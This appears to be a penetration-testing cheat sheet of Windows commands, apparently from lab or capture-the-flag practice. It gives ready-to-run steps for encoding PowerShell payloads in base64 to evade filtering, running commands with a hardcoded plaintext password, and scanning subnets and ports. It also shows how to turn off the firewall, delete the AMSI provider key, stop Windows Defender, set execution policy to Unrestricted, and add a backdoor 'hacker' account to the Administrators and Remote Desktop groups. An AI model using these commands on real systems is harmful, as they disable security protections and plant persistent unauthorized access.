#Windows Tricks

#PowerShell encoded base64

Create a base64 payload to avoid bad characters.

# Create the command to PowerShell execute $ echo -n 'ping -n 2 10.10.14.2' | iconv -t utf-16le | base64 -w 0 cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA== # Run PowerShell with Encoded flag Payload: cmd /c powershell -nop -enc cABpAG4AZwAgAC0AbgAgADIAIAAxADAALgAxADAALgAxADQALgAyAA==

#Run command as User (with creds)

$pass = ConvertTo-SecureString "aliceishere" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("disco\\Alice", $pass) Invoke-Command -ComputerName disco -Credential $cred -ScriptBlock {whoami}

#List running process with args

WMIC path win32_process get Caption,Processid,Commandline

#Scan for hosts and open ports in subnet

# Scan for Hosts in Subnet PS > 1..254 | ForEach-Object {Test-Connection -ComputerName "172.16.2.$_" -Count 1 -ErrorAction SilentlyContinue} # Scan for open Ports PS > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.2.101",$)) "Port $ is open!"} 2>$null

#PowerShell

# PowerShell Directory c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe # FIX THE VARIABLE PATH set PATH=%SystemRoot%\system32;%SystemRoot%;

#Search for files

Get-Childitem –Path C:\ -Include *filetosearch* -Recurse -ErrorAction SilentlyContinue

#Windows Security

#Disable Firewall

NetSh Advfirewall set allprofiles state off

#Disable AMSI

Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

#Disable Defender

sc stop WinDefend

#Execution Policy

Set-ExecutionPolicy Unrestricted Set-ExecutionPolicy Unrestricted -Scope CurrentUser

#Add a RDP user

net user hacker hacker123 /add net localgroup Administrators hacker /add net localgroup "Remote Desktop Users" hacker /ADD